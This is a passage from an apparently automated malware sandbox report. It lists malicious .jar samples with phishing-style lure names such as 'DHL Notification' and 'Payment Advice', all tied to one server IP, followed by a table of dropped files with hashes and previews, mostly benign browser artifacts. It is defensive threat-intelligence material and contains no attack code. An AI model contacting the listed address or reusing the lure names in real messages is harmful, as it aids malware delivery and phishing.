                                                                                                                                                                              Payment Advice-BCS_ECS9522020909153934_3159_952.jarGet hashmaliciousBrowse
                                                                                                                                                                              • 50.87.249.219
                                                                                                                                                                              presentation.jarGet hashmaliciousBrowse
                                                                                                                                                                              • 50.87.249.219
                                                                                                                                                                              presentation.jarGet hashmaliciousBrowse
                                                                                                                                                                              • 50.87.249.219
                                                                                                                                                                              DHL Notification.jarGet hashmaliciousBrowse
                                                                                                                                                                              • 50.87.249.219
                                                                                                                                                                              presentation.jarGet hashmaliciousBrowse
                                                                                                                                                                              • 50.87.249.219
                                                                                                                                                                              presentation.jarGet hashmaliciousBrowse
                                                                                                                                                                              • 50.87.249.219
                                                                                                                                                                              Payment Advice-BCS_ECS9522020909153934_3159_952.jarGet hashmaliciousBrowse
                                                                                                                                                                              • 50.87.249.219
                                                                                                                                                                              Payment Advice-BCS_ECS9522020909153934_3159_952.jarGet hashmaliciousBrowse
                                                                                                                                                                              • 50.87.249.219
                                                                                                                                                                              DHL Notification.jarGet hashmaliciousBrowse
                                                                                                                                                                              • 50.87.249.219
                                                                                                                                                                              RFQ 00234567828723635387632988822.jarGet hashmaliciousBrowse
                                                                                                                                                                              • 50.87.249.219
                                                                                                                                                                              RFQ 00234567828723635387632988822.jarGet hashmaliciousBrowse
                                                                                                                                                                              • 50.87.249.219
                                                                                                                                                                              Annexure A-61322.jarGet hashmaliciousBrowse
                                                                                                                                                                              • 50.87.249.219
                                                                                                                                                                              EPC Works for AMAALA AIRFIELD PROJECT - WORK .jarGet hashmaliciousBrowse
                                                                                                                                                                              • 50.87.249.219
                                                                                                                                                                              Voicemail.jarGet hashmaliciousBrowse
                                                                                                                                                                              • 50.87.249.219
                                                                                                                                                                              presentation.jarGet hashmaliciousBrowse
                                                                                                                                                                              • 50.87.249.219
                                                                                                                                                                              presentation.jarGet hashmaliciousBrowse
                                                                                                                                                                              • 50.87.249.219

                                                                                                                                                                              Dropped Files

                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                              C:\Users\user\AppData\Local\broker.dllpresentation.jarGet hashmaliciousBrowse
                                                                                                                                                                                presentation.jarGet hashmaliciousBrowse

                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                  C:\ProgramData\Oracle\Java\.oracle_jre_usage\cce3fe3b0d8d83e2.timestamp
                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):57
                                                                                                                                                                                  Entropy (8bit):4.817551365376543
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:oFj4I5vpN6yUbLNin:oJ5X6yM4
                                                                                                                                                                                  MD5:77319DC1BE60485CFC878679D31018C3
                                                                                                                                                                                  SHA1:C996970C778C6214A32082F832C679C92FCA3BCC
                                                                                                                                                                                  SHA-256:06464D47AD09224F278ACD074B6C3776BA35488A412FBE59F1D9F5D82F6F1996
                                                                                                                                                                                  SHA-512:74CDE5535735A53D3C709BFEF19930AE6DE7B4B5CA612A8E682FEB7302C680587227AAFAD6E27273AC06EF9471C794B049134380C37D5E6C0B7F6D12B882C6E2
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview: C:\Program Files (x86)\Java\jre1.8.0_211..1620349083180..
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\1WHIQG87\consent-pref.trustarc[1].xml
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                  Entropy (8bit):2.469670487371862
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:D90aKb:JFKb
                                                                                                                                                                                  MD5:C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
                                                                                                                                                                                  SHA1:35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
                                                                                                                                                                                  SHA-256:B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
                                                                                                                                                                                  SHA-512:6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                  Preview: <root></root>
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\HZXWTR4U\www.java[1].xml
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):3077
                                                                                                                                                                                  Entropy (8bit):5.5760794477457045
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:8m9elhm9eQ7Whm9ezhm9eB39Xhm9eB39jhm9eB39Ihm9eB39Bhm9eBn69mhm9eBQ:ze0eANe+eDqeDueDzeDIeadeaUq
                                                                                                                                                                                  MD5:B2E7C28C0C389ED18D25059FCDDFD3A2
                                                                                                                                                                                  SHA1:7ADA89F447B844A5E0275988977C47E598274BE1
                                                                                                                                                                                  SHA-256:1584D7E4E42BA84B866EC2F77703A2FAA080BC793E945B2F711A596263EB08D6
                                                                                                                                                                                  SHA-512:6D01ACC2AC189D6B63C9C2F1C26A0BB376CB5BDE4DB85E5E9AAD4A551FB187C96780EAC925CAFE40A30A207E03ECB76ACDB00D37439D752F22E9D3E371CED79F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview: <root></root><root></root><root></root><root></root><root></root><root></root><root></root><root><item name="ORA_COOK_STORE" value="{&quot;ORA_FPC&quot;:&quot;ORA_FPC=id=24a55959-4e98-40a8-a8a2-9fd743f7be30; expires=Sun, 07 May 2023 12:35:41 GMT; path=/&quot;}" ltime="210092688" htime="30884572" /></root><root><item name="ORA_COOK_STORE" value="{&quot;ORA_FPC&quot;:&quot;ORA_FPC=id=24a55959-4e98-40a8-a8a2-9fd743f7be30; expires=Sun, 07 May 2023 12:35:41 GMT; path=/&quot;,&quot;test_cookie48632&quot;:&quot;test_cookie48632=cookie;domain=.com;path=/;expires=Sat, 08 May 2021 00:58:10 GMT&quot;}" ltime="210212688" htime="30884572" /></root><root><item name="ORA_COOK_STORE" value="{&quot;ORA_FPC&quot;:&quot;ORA_FPC=id=24a55959-4e98-40a8-a8a2-9fd743f7be30; expires=Sun, 07 May 2023 12:35:41 GMT; path=/&quot;}" ltime="210252688" htime="30884572" /></root><root><item name="ORA_COOK_STORE" value="{&quot;ORA_FPC&quot;:&quot;ORA_FPC=id=24a55959-4e98-40a8-a8a2-9fd743f7be30; expires=Sun, 07 May 2023
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\KZCX22WH\consent.trustarc[1].xml
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                  Entropy (8bit):2.469670487371862
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:D90aKb:JFKb
                                                                                                                                                                                  MD5:C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
                                                                                                                                                                                  SHA1:35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
                                                                                                                                                                                  SHA-256:B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
                                                                                                                                                                                  SHA-512:6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: <root></root>
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{4774F23E-AECF-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):38488
                                                                                                                                                                                  Entropy (8bit):1.9001724104575213
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:r7ZYZo2sQNWsjtsTfsltsrHWsTsefskMrsXDfsT7rsig:rN4/+kSuPShESSG
                                                                                                                                                                                  MD5:34F83BC0D7AE7D4D9FBA8814E1214EE5
                                                                                                                                                                                  SHA1:5E5403D4DFCCC034684CC8547BECB844488E18AF
                                                                                                                                                                                  SHA-256:5D088CF0DD11AFF62CBC9FA4CFF26EC25954C54F17CB1033266A2EF27C3AC610
                                                                                                                                                                                  SHA-512:6D7A29E5969C0560511796031717D654EAB6AAD7D0459EA69507BE348A3892FFE8B954368BCAFD31EF18D978327041D285DC86DD82EC7BB38F601076D845495A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{4774F240-AECF-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):123316
                                                                                                                                                                                  Entropy (8bit):3.582003734177119
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:rPHFGf6acjd6gxmU9AHWFzDpFmAPpR1EXYR1V6XwR1uLSZfPnzZTZ1ZqZG0Z7ZPL:1mU9A2Fz9nnLqWKwrsYrfO
                                                                                                                                                                                  MD5:96D4325DAE2A0E8A54935BE4B42425CB
                                                                                                                                                                                  SHA1:CA52DD8926523694658C052DF3464395C7182524
                                                                                                                                                                                  SHA-256:9942E8AC4C32670E1B8D43AE2955ACDA341BE7916D12879AAE0E0CDCCC49007E
                                                                                                                                                                                  SHA-512:DB1E4DDAB6E0A4281BFFBD8392F29D51267D0C08B1C763D093CF1F9BC778CABA40C6194607AA9197C35B7BED93618375CB97281F4C4C28612D02423BC0B2FE18
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{4774F241-AECF-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):19032
                                                                                                                                                                                  Entropy (8bit):1.5843453942242887
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:Iw0GcprFGwpa8G4pQfGrapbSfGQpKVG7HpRDTGIpX2jGApm:roZPQc6jBSJAETpF6g
                                                                                                                                                                                  MD5:536A03BDE1C855EAD5F98C4D32F1A5E4
                                                                                                                                                                                  SHA1:FA7D0D9161425674E12A96A48FA585AE60F6F9DC
                                                                                                                                                                                  SHA-256:827AC8248091B050FDBF55DA0DC93C102388A75CC1E7F7930D3097175C3D660E
                                                                                                                                                                                  SHA-512:F343F3A5E192A0005FD37F03071191E0B89D378E7BC446A6E8200FF5C6EC0E91116744178DC5850101EE6D39FCEDF1BC010FB4C8890414557A729E7CDA9DB1F6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):656
                                                                                                                                                                                  Entropy (8bit):5.108239286922099
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:TMHdNMNxOEo+/+J4nWimI002EtM3MHdNMNxOEo+/+J4nWimI00ObVbkEtMb:2d6NxOP4SZHKd6NxOP4SZ76b
                                                                                                                                                                                  MD5:07713F8795A7AC8D40E29BB774A0D60F
                                                                                                                                                                                  SHA1:8DE093E466A6581B78CF088EB536BCFE98C8A00C
                                                                                                                                                                                  SHA-256:A15F31ABA1CF2C1203189CE38F4002918799075BCBB38B1A970F1F1039F1E18A
                                                                                                                                                                                  SHA-512:3396EC531E9EBB021E86BE9667D6C7786FDF3D6FCB9D7218A939654E83DFF3F330A575DE43FDF995DC64EEDBAA396C6A8D9CBA5D19CD95C1EF86FA5B7D3BD80C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x1d60b326,0x01d742dc</date><accdate>0x1d60b326,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x1d60b326,0x01d742dc</date><accdate>0x1d60b326,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):653
                                                                                                                                                                                  Entropy (8bit):5.1108173845531475
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:TMHdNMNxe2ke4nWimI002EtM3MHdNMNxe2ke4nWimI00Obkak6EtMb:2d6Nxrt4SZHKd6Nxrt4SZ7Aa7b
                                                                                                                                                                                  MD5:B9AD8C1B0799CA40C85D5280F22D1E1B
                                                                                                                                                                                  SHA1:FA3F50BA5146A4BEEAE8BC0AF5FE029B24730223
                                                                                                                                                                                  SHA-256:5201DEFD931706EC10E5C409F891BCF42BC08E6339728F74ECE4B001B56DB6F8
                                                                                                                                                                                  SHA-512:2167643F96CFD0D45DFD1B953EF15652EC025DB1199EF9FA7B66468D3C2949CADE996507AA17A81014C9B6A1BA19306CA533BBC43D00C18507DE01832C27185B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x1d598c0a,0x01d742dc</date><accdate>0x1d598c0a,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x1d598c0a,0x01d742dc</date><accdate>0x1d598c0a,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):662
                                                                                                                                                                                  Entropy (8bit):5.1257647004823506
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:TMHdNMNxvLo+/+J4nWimI002EtM3MHdNMNxvLo+/+J4nWimI00ObmZEtMb:2d6Nxv44SZHKd6Nxv44SZ7mb
                                                                                                                                                                                  MD5:6F65D739DA46501A6EC1493AAC393DE0
                                                                                                                                                                                  SHA1:A6846ABCA9709295ABACEACDDD19A02CC9E2F062
                                                                                                                                                                                  SHA-256:A6A46931E159F9301B7AA5689DBECB299726CCE0D1F5982745A916F619100930
                                                                                                                                                                                  SHA-512:BDB14B3D12E12A89A0824E2F2C75770831A4A3B0B575F858DB8C88A612859BD5AE07BFC944F27CFBE5266E2521FA097B6DE35D281B2B458D78937C8B4EA6566A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x1d60b326,0x01d742dc</date><accdate>0x1d60b326,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x1d60b326,0x01d742dc</date><accdate>0x1d60b326,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):647
                                                                                                                                                                                  Entropy (8bit):5.077125650463378
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:TMHdNMNxiZEIEJ4nWimI002EtM3MHdNMNxiZEIEJ4nWimI00Obd5EtMb:2d6Nxud64SZHKd6Nxud64SZ7Jjb
                                                                                                                                                                                  MD5:54121404D1FD1B3FD5AFCED31AB3B825
                                                                                                                                                                                  SHA1:D41C4E4E87CBA4B612EA70A706CDC2AE26281C8F
                                                                                                                                                                                  SHA-256:6830F81D4E257DC42D6BB0170D277DE6C296C8C1A0326F81637A2FE557C6B84D
                                                                                                                                                                                  SHA-512:4BD6E7D671D625E2B7EA40638138130EB0435678FEB98AF96997D5A60E9AB249EFD08D72EB160CA907D1D4DFD646F9CB6DF93CFA12B7EAE63990BAD393E61670
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x1d5e50cf,0x01d742dc</date><accdate>0x1d5e50cf,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x1d5e50cf,0x01d742dc</date><accdate>0x1d5e50cf,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):656
                                                                                                                                                                                  Entropy (8bit):5.140567764801727
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:TMHdNMNxhGwo+/+J4nWimI002EtM3MHdNMNxhGwo+5BJ4nWimI00Ob8K075EtMb:2d6NxQL4SZHKd6NxQkJ4SZ7YKajb
                                                                                                                                                                                  MD5:D4E256C70E80CABF3085DAA85A378424
                                                                                                                                                                                  SHA1:41765F3E0B1B5D1BC557919E363ECC59E8C5B2E5
                                                                                                                                                                                  SHA-256:162A5433AFCC02FFA5E9D1DD93EFC8BBCC9E8DE7A9E2C5833F8E56CD9E9B37CC
                                                                                                                                                                                  SHA-512:6236043B9405D5F7F74EDFCE6E97028ACF575C6676D6F800C7712DE1052D92D89532068A21D9AFA9D267B5E05CE4F78A68BBCB8D76A760E2BBBC5FA0EF1D23EA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x1d60b326,0x01d742dc</date><accdate>0x1d60b326,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x1d60b326,0x01d742dc</date><accdate>0x1d63157d,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):653
                                                                                                                                                                                  Entropy (8bit):5.060355510332473
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:TMHdNMNx0nZEIEJ4nWimI002EtM3MHdNMNx0nZEIEJ4nWimI00ObxEtMb:2d6Nx0Zd64SZHKd6Nx0Zd64SZ7nb
                                                                                                                                                                                  MD5:924F4E913AAA09BEAC5468228CDFAC64
                                                                                                                                                                                  SHA1:AA740BAAC12F11C9A7544AA24DB4FB35378F1C2C
                                                                                                                                                                                  SHA-256:3C2BB959BEA31D07B3981ECAA45EA6B8E2C0979689F260171D2525FDF8F6FC90
                                                                                                                                                                                  SHA-512:E60E41BB35B986D9F456EF16936673DFB426B8FC8CBF5D69DD9E97D2D71B71FC71C1C9A9F71AA2EB6185E6102F89829F4D85C7842A13177B38943844334B6E2C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x1d5e50cf,0x01d742dc</date><accdate>0x1d5e50cf,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x1d5e50cf,0x01d742dc</date><accdate>0x1d5e50cf,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):656
                                                                                                                                                                                  Entropy (8bit):5.102242690917078
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:TMHdNMNxxZEIEJ4nWimI002EtM3MHdNMNxxZEIEJ4nWimI00Ob6Kq5EtMb:2d6NxLd64SZHKd6NxLd64SZ7ob
                                                                                                                                                                                  MD5:8BA23C73B9F8799E77FDDEE6B777A519
                                                                                                                                                                                  SHA1:9D8289AB181D3A85E8935C19ED6EF4C98C124556
                                                                                                                                                                                  SHA-256:8014B64EAA9F1AD1B27DBCF8EF24D4F7BCAD6F7C72ECCE884E7525F94FA5245E
                                                                                                                                                                                  SHA-512:D3EA14120E13562FF4409E53D32F3AFCAD7C772B4AFAC4A85D912DE48AF89B88BEB9306E4E8D5C32AF488E5CBCC340436DF6C64C60C36F1978A7A0EE5B3F5BDC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x1d5e50cf,0x01d742dc</date><accdate>0x1d5e50cf,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x1d5e50cf,0x01d742dc</date><accdate>0x1d5e50cf,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):659
                                                                                                                                                                                  Entropy (8bit):5.097866866947177
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:TMHdNMNxcO4nWimI002EtM3MHdNMNxcO4nWimI00ObVEtMb:2d6Nxx4SZHKd6Nxx4SZ7Db
                                                                                                                                                                                  MD5:230491B80E7BAE7D78EE4B964FABEE0E
                                                                                                                                                                                  SHA1:810AD9F2DFCAE9DD64E72EB1570C37BF10025E5C
                                                                                                                                                                                  SHA-256:27DBADC3454822B040E4DF0FDC612F2CC7C10A7800A5015374CE34F1DBDFA852
                                                                                                                                                                                  SHA-512:16EA816EFB7FCCCD84E49E73C8BFD6683DAEC3EBDBE3D8AA4931BA9A3E5361136187D56F8243C33497241E6BBF3B5B053D0578C475C25DAA6E5A05558EB487BC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x1d5bee6a,0x01d742dc</date><accdate>0x1d5bee6a,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x1d5bee6a,0x01d742dc</date><accdate>0x1d5bee6a,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):653
                                                                                                                                                                                  Entropy (8bit):5.0829255123153025
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:TMHdNMNxfnO4nWimI002EtM3MHdNMNxfnO4nWimI00Obe5EtMb:2d6Nxm4SZHKd6Nxm4SZ7ijb
                                                                                                                                                                                  MD5:314DACA36A887E7E62860F5A6EED3265
                                                                                                                                                                                  SHA1:7F2375636726FF59143029BADA8168B64D39BAD8
                                                                                                                                                                                  SHA-256:2094BCAFA6E1997D72104DF62D9742BF482DFFF2A5575FD0F1CF15BFB26FB4C5
                                                                                                                                                                                  SHA-512:C3C13642FE34D0F64BFA0474E92C702D1B2F8373B182A8DD671D8359DFCBF8AEB1D1196BE98D655C5E6D16520C11CC99B6E46A4BF2C9B1C38B7FD2D6D171E277
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x1d5bee6a,0x01d742dc</date><accdate>0x1d5bee6a,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x1d5bee6a,0x01d742dc</date><accdate>0x1d5bee6a,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\ynfz0jx\imagestore.dat
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1252
                                                                                                                                                                                  Entropy (8bit):5.511165549357704
                                                                                                                                                                                  Encrypted:false
